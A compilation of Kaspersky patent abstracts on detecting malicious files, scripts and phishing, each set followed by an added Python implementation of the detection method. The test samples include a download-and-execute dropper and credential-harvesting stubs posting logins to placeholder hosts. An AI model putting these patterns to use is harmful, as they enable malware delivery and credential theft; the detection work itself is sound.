System and method for detecting harmful files executable on a virtual stack machine based on parameters of the files and the virtual stack machine

    Publication number: US10013555B2

    Publication date: 2018-07-03

    Application number: US15182083

    Filing date: 2016-06-14

    Applicant: AO Kaspersky Lab

    IPC classification: G06F21/56 G06F9/455 G06F17/30

    Abstract: Disclosed are a method and system for detecting harmful files executed by a virtual stack machine. An example method includes: analyzing a file executable on the virtual stack machine to identify both parameters of a file section of the file and parameters of a function of the virtual stack machine when executing the file; identifying, in a database, at least one cluster of safe files based on the identified parameters of the file section of the file and the identified parameters of the virtual stack machine; creating, using at least one clustering rule, a data cluster based on the identified at least one cluster of safe files; calculating at least one checksum of the created data cluster; and determining that the file executable on the virtual stack machine is harmful if the computed at least one checksum matches a checksum in a database of checksums of harmful files.

    SYSTEM AND METHOD FOR DETECTING MALICIOUS COMPOUND FILES

    Publication number: US20180101682A1

    Publication date: 2018-04-12

    Application number: US15411132

    Filing date: 2017-01-20

    Applicant: AO Kaspersky Lab

    IPC classification: G06F21/56

    CPC classification: G06F21/565

    Abstract: A method and system are provided for detecting malicious compound files. An example method includes: obtaining at least one compound file; identifying a first set of features of the at least one compound file including features associated with a header of the at least one compound file; subsequent to identifying the first set of features, identifying, by the processor, a second set of features of the at least one compound file including features associated with at least one directory of the at least one compound file; determining a hash sum of the at least one compound file based on the first and second set of features; comparing the hash sum of the at least one compound file with information associated with a plurality of compound files stored in a database; and identifying the at least one compound file as being malicious, trusted or untrusted based at least on comparison results.

    System and method for blocking execution of scripts

    Publication number: US09648032B2

    Publication date: 2017-05-09

    Application number: US15062455

    Filing date: 2016-03-07

    Applicant: AO Kaspersky Lab

    IPC classification: G06F21/56 H04L29/06

    Abstract: Disclosed are exemplary aspects of systems and methods for blocking execution of scripts. An exemplary method comprises: intercepting a request for a script from a client to a server; generating a bytecode of the intercepted script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and a plurality of hash sums of malicious and clean scripts stored in a database; identifying a similar hash sum from the database whose degree of similarity with the hash sum of the bytecode is within a threshold of similarity; determining a coefficient of trust of the similar hash sum; determining whether the requested script is malicious based on the degree of similarity and the coefficient of trust of the similar hash sum; and blocking the execution of the malicious script on the client.

    System and method for detecting malicious compound files

    Publication number: US10339312B2

    Publication date: 2019-07-02

    Application number: US15411132

    Filing date: 2017-01-20

    Applicant: AO Kaspersky Lab

    IPC classification: G06F21/56

    Abstract: A method and system are provided for detecting malicious compound files. An example method includes: obtaining at least one compound file; identifying a first set of features of the at least one compound file including features associated with a header of the at least one compound file; subsequent to identifying the first set of features, identifying, by the processor, a second set of features of the at least one compound file including features associated with at least one directory of the at least one compound file; determining a hash sum of the at least one compound file based on the first and second set of features; comparing the hash sum of the at least one compound file with information associated with a plurality of compound files stored in a database; and identifying the at least one compound file as being malicious, trusted or untrusted based at least on comparison results.
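    The two-stage feature hash that this abstract and the earlier US20180101682A1 entry describe, carried out on a Compound File Binary (OLE2) document built in memory. This is an added example and is not code from the patent or from AO Kaspersky Lab: the header and directory-entry offsets follow the public [MS-CFB] layout, while the choice of which header and directory fields become features, the SHA-256 canonicalisation, the extra "invalid" verdict for containers that do not parse, and the verdict database are assumptions made here.

```python
"""Feature-hash classification of a Compound File Binary (OLE2) document.

Added example, not code from the patent or from Kaspersky: header features
first, then directory features, one hash over both, lookup in a verdict
database. Offsets follow the public [MS-CFB] layout; the feature selection
and the verdict database are assumptions for this illustration.
"""
import hashlib
import json
import struct

CFB_MAGIC = b"\xd0\xcf\x11\xe0\xa1\xb1\x1a\xe1"
MAXREGSECT, FATSECT, ENDOFCHAIN, FREESECT = 0xFFFFFFFA, 0xFFFFFFFD, 0xFFFFFFFE, 0xFFFFFFFF
NOSTREAM = 0xFFFFFFFF
HEADER_FMT = "<8s16sHHHHH6sIIIIIIIII"    # 76 bytes; 109 DIFAT slots follow at offset 76
DIRENT_FMT = "<64sHBBIII16sI8s8sIQ"      # one 128-byte directory entry


def parse_cfb(data: bytes):
    """Return (header_features, [(name, object_type, size), ...]) or raise ValueError."""
    if len(data) < 512:
        raise ValueError("too short for a compound file header")
    (magic, _clsid, minor, major, _order, sec_shift, mini_shift, _res, _ndir, n_fat,
     first_dir, _txn, mini_cutoff, _fmini, n_minifat, _fdifat, n_difat
     ) = struct.unpack_from(HEADER_FMT, data, 0)
    if magic != CFB_MAGIC or sec_shift not in (9, 12):
        raise ValueError("not a compound file")
    sector = 1 << sec_shift
    off = lambda s: (s + 1) * sector           # sector 0 begins right after the header

    fat = []                                   # every FAT sector the DIFAT points at
    for s in struct.unpack_from("<109I", data, 76)[:n_fat]:
        if s > MAXREGSECT or off(s) + sector > len(data):
            raise ValueError("FAT sector outside file")
        fat += struct.unpack_from(f"<{sector // 4}I", data, off(s))

    entries, sec, seen = [], first_dir, set()
    while sec <= MAXREGSECT:                   # ENDOFCHAIN / FREESECT end the chain
        if sec in seen or sec >= len(fat) or off(sec) + sector > len(data):
            raise ValueError("broken or cyclic directory chain")   # hostile-input guard
        seen.add(sec)
        for i in range(sector // 128):
            (raw, nlen, otype, _c, _l, _r, _ch, _cls, _st, _ct, _mt, _start, size
             ) = struct.unpack_from(DIRENT_FMT, data, off(sec) + i * 128)
            if otype != 0 and 2 <= nlen <= 64:   # skip unused slots
                entries.append((raw[:nlen - 2].decode("utf-16-le", "replace"), otype, size))
        sec = fat[sec]
    header_features = (major, minor, sec_shift, mini_shift, n_fat, mini_cutoff, n_minifat, n_difat)
    return header_features, entries


def feature_hash(data: bytes) -> str:
    """Stage 1 header features, stage 2 directory features, one SHA-256 over both."""
    header, entries = parse_cfb(data)
    canon = json.dumps([list(header), sorted(entries)], separators=(",", ":")).encode()
    return hashlib.sha256(canon).hexdigest()


def classify(data: bytes, verdict_db: dict) -> str:
    """'malicious' or 'trusted' when the hash is known, 'untrusted' when it is not,
    'invalid' when the container does not parse (assumed extra verdict)."""
    try:
        return verdict_db.get(feature_hash(data), "untrusted")
    except ValueError:
        return "invalid"


def _dirent(name, otype, left=NOSTREAM, right=NOSTREAM, child=NOSTREAM, start=ENDOFCHAIN, size=0):
    raw = name.encode("utf-16-le") + b"\x00\x00"
    return struct.pack(DIRENT_FMT, raw, len(raw), otype, 1, left, right, child,
                       b"\x00" * 16, 0, b"\x00" * 8, b"\x00" * 8, start, size)


def build_sample(macro_stream: str = "VBA_PROJECT") -> bytes:
    """Constructed 4-sector document: FAT, directory, two stream sectors."""
    header = struct.pack(HEADER_FMT, CFB_MAGIC, b"\x00" * 16, 0x3E, 3, 0xFFFE, 9, 6,
                         b"\x00" * 6, 0, 1, 1, 0, 4096, ENDOFCHAIN, 0, ENDOFCHAIN, 0)
    header += struct.pack("<109I", 0, *[FREESECT] * 108)    # DIFAT: the FAT is sector 0
    fat = struct.pack("<128I", FATSECT, ENDOFCHAIN, ENDOFCHAIN, ENDOFCHAIN, *[FREESECT] * 124)
    directory = (_dirent("Root Entry", 5, child=1)
                 + _dirent("WordDocument", 2, right=2, start=2, size=40)
                 + _dirent("Macros", 1, child=3)
                 + _dirent(macro_stream, 2, start=3, size=33))
    streams = b"\x00" * 512 + b'Attribute VB_Name = "ThisDocument"'.ljust(512, b"\x00")
    return header + fat + directory + streams


if __name__ == "__main__":
    sample = build_sample()
    known = {feature_hash(sample): "malicious"}     # constructed verdict database
    print(parse_cfb(sample)[1])
    print(classify(sample, known), classify(build_sample("Data"), known), classify(b"MZ" * 300, known))
```

    Running the file prints the parsed directory and three verdicts. The parser bounds every sector read and refuses a cyclic directory chain; a detector built this way should treat a container its parser rejects as suspicious rather than skip it, because office applications are far more tolerant of malformed containers than a strict parser is.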

    SYSTEM AND METHOD FOR DETECTING HARMFUL FILES EXECUTABLE ON A VIRTUAL STACK MACHINE BASED ON PARAMETERS OF THE FILES AND THE VIRTUAL STACK MACHINE

    Document type: Invention application; legal status: in force

    Publication number: US20170004310A1

    Publication date: 2017-01-05

    Application number: US15182083

    Filing date: 2016-06-14

    Applicant: AO Kaspersky Lab

    IPC classification: G06F21/56 G06F9/455 G06F17/30

    Abstract: Disclosed are a method and system for detecting harmful files executed by a virtual stack machine. An example method includes: analyzing a file executable on the virtual stack machine to identify both parameters of a file section of the file and parameters of a function of the virtual stack machine when executing the file; identifying, in a database, at least one cluster of safe files based on the identified parameters of the file section of the file and the identified parameters of the virtual stack machine; creating, using at least one clustering rule, a data cluster based on the identified at least one cluster of safe files; calculating at least one checksum of the created data cluster; and determining that the file executable on the virtual stack machine is harmful if the computed at least one checksum matches a checksum in a database of checksums of harmful files.

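    The parameter extraction, safe-cluster lookup, data-cluster construction and checksum comparison that this abstract and the granted US10013555B2 entry describe, as an added example that is not code from the patent or from AO Kaspersky Lab. CPython's compiler and bytecode are used as a stand-in virtual stack machine (its code objects expose argument counts, locals and maximum stack depth per function); the safe-cluster centroids, the clustering rules, the particular parameters chosen and the sample scripts are assumptions.

```python
"""Cluster-checksum detection for an executable of a virtual stack machine.

Added example, not code from the patent or from Kaspersky. CPython's compiler
and bytecode stand in for the virtual stack machine. The safe-cluster
centroids, the clustering rules and the sample scripts are assumptions;
samples are compiled for analysis and never executed.
"""
import dis
import hashlib
import json
import math
import types
from collections import Counter

# Assumed database of safe-file clusters: name, centroid of the parameter vector
# (code objects, instructions, max stack depth, imports, attribute names) and the
# clustering rule, i.e. which parameters form the data cluster that is checksummed.
SAFE_CLUSTERS = [
    ("small-script",   (1, 30, 3, 0, 2),  ("opcode_profile",)),
    ("io-utility",     (4, 120, 5, 2, 8), ("opcode_profile", "imports")),
    ("net-automation", (3, 90, 6, 3, 12), ("imports", "calls", "stack_profile")),
]


def extract_parameters(source: str) -> dict:
    """Compile the script (never run it) and read the stack-machine parameters
    of every code object it contains, nested functions included."""
    opcodes, imports, attrs, stack_profile = Counter(), set(), set(), []
    n_instructions, todo = 0, [compile(source, "<sample>", "exec")]
    while todo:
        code = todo.pop()
        stack_profile.append((code.co_argcount, code.co_nlocals, code.co_stacksize))
        todo += [c for c in code.co_consts if isinstance(c, types.CodeType)]
        for ins in dis.get_instructions(code):
            n_instructions += 1
            opcodes[ins.opname] += 1
            if ins.opname == "IMPORT_NAME":
                imports.add(ins.argval)
            elif ins.opname in ("LOAD_ATTR", "LOAD_METHOD"):
                attrs.add(ins.argval)      # API names survive variable renaming
    return {
        "vector": (len(stack_profile), n_instructions,
                   max(s[2] for s in stack_profile), len(imports), len(attrs)),
        "opcode_profile": sorted(opcodes.items()),
        "imports": sorted(imports),
        "calls": sorted(attrs),
        "stack_profile": sorted(stack_profile),
    }


def nearest_safe_cluster(vector: tuple) -> tuple:
    """Nearest centroid in log space, so instruction counts do not swamp the rest."""
    def dist(a, b):
        return math.sqrt(sum((math.log1p(x) - math.log1p(y)) ** 2 for x, y in zip(a, b)))
    return min(SAFE_CLUSTERS, key=lambda c: dist(vector, c[1]))


def cluster_checksum(params: dict) -> tuple:
    """Build the data cluster by the chosen cluster's rule and checksum its canonical form."""
    name, _centroid, rule = nearest_safe_cluster(params["vector"])
    data_cluster = {key: params[key] for key in rule}
    canon = json.dumps(data_cluster, sort_keys=True, separators=(",", ":")).encode()
    return name, hashlib.sha256(canon).hexdigest()


def is_harmful(source: str, harmful_checksums: set) -> bool:
    return cluster_checksum(extract_parameters(source))[1] in harmful_checksums


# Constructed samples (strings only: compiled for analysis, never executed).
MALICIOUS = '''
import urllib.request, subprocess, tempfile
def fetch(url):
    return urllib.request.urlopen(url).read()
def run(payload):
    f = tempfile.NamedTemporaryFile(delete=False, suffix=".exe")
    f.write(payload)
    f.close()
    subprocess.Popen([f.name])
run(fetch("http://example.invalid/stage2"))
'''
VARIANT = '''
import urllib.request, subprocess, tempfile
def grab(u):
    return urllib.request.urlopen(u).read()
def launch(blob):
    h = tempfile.NamedTemporaryFile(delete=False, suffix=".scr")
    h.write(blob)
    h.close()
    subprocess.Popen([h.name])
launch(grab("http://example.invalid/update"))
'''
SAFE = '''
import json, sys
def load(path):
    with open(path) as fh:
        return json.load(fh)
print(len(load(sys.argv[1])))
'''

if __name__ == "__main__":
    harmful_db = {cluster_checksum(extract_parameters(MALICIOUS))[1]}   # from the known sample
    for label, src in (("variant", VARIANT), ("safe", SAFE)):
        name, chk = cluster_checksum(extract_parameters(src))
        print(f"{label}: cluster={name} harmful={chk in harmful_db}")
```

    The renamed-identifier, new-string variant produces the same checksum as the known sample because the rule selects imports, attribute names and per-function VM settings rather than file bytes, which is the point of checksumming a data cluster instead of the whole file. A deployment derives the centroids and rules from a corpus of safe files instead of the constants above.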

    SYSTEM AND METHOD FOR BLOCKING EXECUTION OF SCRIPTS

    Publication number: US20170093893A1

    Publication date: 2017-03-30

    Application number: US15062455

    Filing date: 2016-03-07

    Applicant: AO Kaspersky Lab

    IPC classification: H04L29/06

    Abstract: Disclosed are exemplary aspects of systems and methods for blocking execution of scripts. An exemplary method comprises: intercepting a request for a script from a client to a server; generating a bytecode of the intercepted script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and a plurality of hash sums of malicious and clean scripts stored in a database; identifying a similar hash sum from the database whose degree of similarity with the hash sum of the bytecode is within a threshold of similarity; determining a coefficient of trust of the similar hash sum; determining whether the requested script is malicious based on the degree of similarity and the coefficient of trust of the similar hash sum; and blocking the execution of the malicious script on the client.

    System and method for detection of phishing scripts

    Document type: Invention grant; legal status: in force

    Publication number: US09497218B1

    Publication date: 2016-11-15

    Application number: US15062715

    Filing date: 2016-03-07

    Applicant: AO Kaspersky Lab

    IPC classification: G06F11/00 H04L29/06

    CPC classification: H04L63/1483 G06F21/562

    Abstract: Disclosed are exemplary aspects of systems and methods for detection of phishing scripts. An exemplary method comprises: generating a bytecode of a script; computing a hash sum of the generated bytecode; determining a degree of similarity between the hash sum of the bytecode and hash sums in one or more groups of hash sums of known phishing scripts; identifying at least one group of hash sums that contains a hash sum whose degree of similarity with the hash sum of the bytecode is within a threshold; determining a coefficient of compactness of the identified group of hash sums and a coefficient of trust of the identified group of hash sums; and determining whether the script is a phishing script based on the degree of similarity, the coefficient of compactness and the coefficient of trust.

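    The bytecode hash-sum similarity decision shared by the two script-blocking entries (US09648032B2 and US20170093893A1) and the group-based phishing decision of this entry, as one added example; it is not code from the patents or from AO Kaspersky Lab. CPython's compiler stands in for the bytecode generator (the intercepted scripts would normally be JavaScript compiled by the interceptor's own engine), the hash sum is the set of hashed opcode trigrams compared by Jaccard overlap, and the similarity threshold, the way the coefficients of trust and compactness enter the verdict, and the sample scripts are assumptions.

```python
"""Similarity verdicts on script bytecode: the block/allow decision of the
script-blocking abstracts and the group-based decision of the phishing one.

Added example, not code from the patents or from Kaspersky. CPython's compiler
stands in for the bytecode generator; the "hash sum" is the set of hashed
opcode trigrams and the degree of similarity is Jaccard overlap. Thresholds,
coefficient formulas and samples are assumptions; samples are never executed.
"""
import dis
import hashlib
import itertools
import types

SIMILARITY_THRESHOLD = 0.8   # assumed: how close a stored hash sum must be
MIN_CONFIDENCE = 0.5         # assumed: floor for similarity x trust (x compactness)


def bytecode_hash_sum(source: str) -> frozenset:
    """Compile the script and hash every opcode trigram. Operands are dropped, so
    renamed identifiers and changed string constants give the same hash sum."""
    names, todo = [], [compile(source, "<script>", "exec")]
    while todo:
        code = todo.pop()
        names += [ins.opname for ins in dis.get_instructions(code)]
        todo += [c for c in code.co_consts if isinstance(c, types.CodeType)]
    return frozenset(
        int.from_bytes(hashlib.blake2b(" ".join(t).encode(), digest_size=4).digest(), "big")
        for t in zip(names, names[1:], names[2:]))


def degree_of_similarity(a: frozenset, b: frozenset) -> float:
    return len(a & b) / len(a | b) if a or b else 1.0


def script_verdict(source: str, hash_db: list) -> str:
    """hash_db entries: (hash_sum, label, coefficient_of_trust). The trust
    coefficient is how far the database vouches for that label (assumed)."""
    h = bytecode_hash_sum(source)
    best = max(hash_db, key=lambda e: degree_of_similarity(h, e[0]), default=None)
    if best is None:
        return "allow"
    sim = degree_of_similarity(h, best[0])
    if sim < SIMILARITY_THRESHOLD:
        return "allow"                       # nothing similar enough in the database
    _h, label, trust = best
    return "block" if label == "malicious" and sim * trust >= MIN_CONFIDENCE else "allow"


def group_compactness(members: list) -> float:
    """Mean pairwise similarity inside a group of phishing hash sums (assumed definition)."""
    pairs = list(itertools.combinations(members, 2))
    return sum(degree_of_similarity(a, b) for a, b in pairs) / len(pairs) if pairs else 1.0


def is_phishing(source: str, groups: list) -> bool:
    """groups: (list_of_hash_sums, coefficient_of_trust) per group of known phishing scripts."""
    h = bytecode_hash_sum(source)
    for members, trust in groups:
        sim = max(degree_of_similarity(h, m) for m in members)
        if sim >= SIMILARITY_THRESHOLD and sim * group_compactness(members) * trust >= MIN_CONFIDENCE:
            return True
    return False


# Constructed samples: credential-harvesting stubs and a clean script (strings only).
PHISH_A = '''
import urllib.request, urllib.parse
def harvest(form):
    creds = {"user": form["login"], "pass": form["password"]}
    data = urllib.parse.urlencode(creds).encode()
    urllib.request.urlopen("http://collector.invalid/drop", data)
    return "https://bank.example/login"
'''
PHISH_B = '''
import urllib.request, urllib.parse
def collect(f):
    d = {"u": f["email"], "p": f["pwd"]}
    body = urllib.parse.urlencode(d).encode()
    urllib.request.urlopen("http://sink.invalid/in", body)
    return "https://mail.example/signin"
'''
PHISH_C = '''
import urllib.request, urllib.parse
def harvest(form):
    creds = {"user": form["login"], "pass": form["password"]}
    creds["ua"] = "Mozilla/5.0"
    data = urllib.parse.urlencode(creds).encode()
    urllib.request.urlopen("http://collector.invalid/drop", data)
    return "https://bank.example/login"
'''
CLEAN = '''
def checksum(values):
    total = 0
    for v in values:
        total = (total * 31 + v) % 65521
    return total
print(checksum(range(10)))
'''


def build_hash_db() -> list:
    return [(bytecode_hash_sum(PHISH_A), "malicious", 0.95), (bytecode_hash_sum(CLEAN), "clean", 0.9)]


def build_phishing_groups() -> list:
    return [([bytecode_hash_sum(PHISH_A), bytecode_hash_sum(PHISH_C)], 0.95)]


if __name__ == "__main__":
    for label, src in (("PHISH_B", PHISH_B), ("CLEAN", CLEAN)):
        print(label, script_verdict(src, build_hash_db()), is_phishing(src, build_phishing_groups()))
```

    PHISH_B is PHISH_A with every identifier and string changed, so its hash sum is identical and it is blocked on the strength of the single stored entry; PHISH_C adds one statement and is therefore only similar, which is what pulls the group's compactness below 1.0. Operand-free trigrams are what let one database entry cover a family, and the price is that scripts with the same control-flow skeleton but different behaviour look alike too, which is why the verdict weighs the coefficient of trust rather than similarity alone.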